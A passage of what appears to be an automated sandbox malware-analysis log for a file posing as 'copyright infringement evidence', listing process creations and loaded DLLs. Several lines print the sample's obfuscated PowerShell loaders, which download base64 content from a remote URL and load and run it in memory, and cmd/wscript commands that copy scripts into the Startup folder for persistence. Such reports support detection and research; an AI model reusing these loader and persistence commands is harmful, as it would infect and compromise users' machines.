{0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2x_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
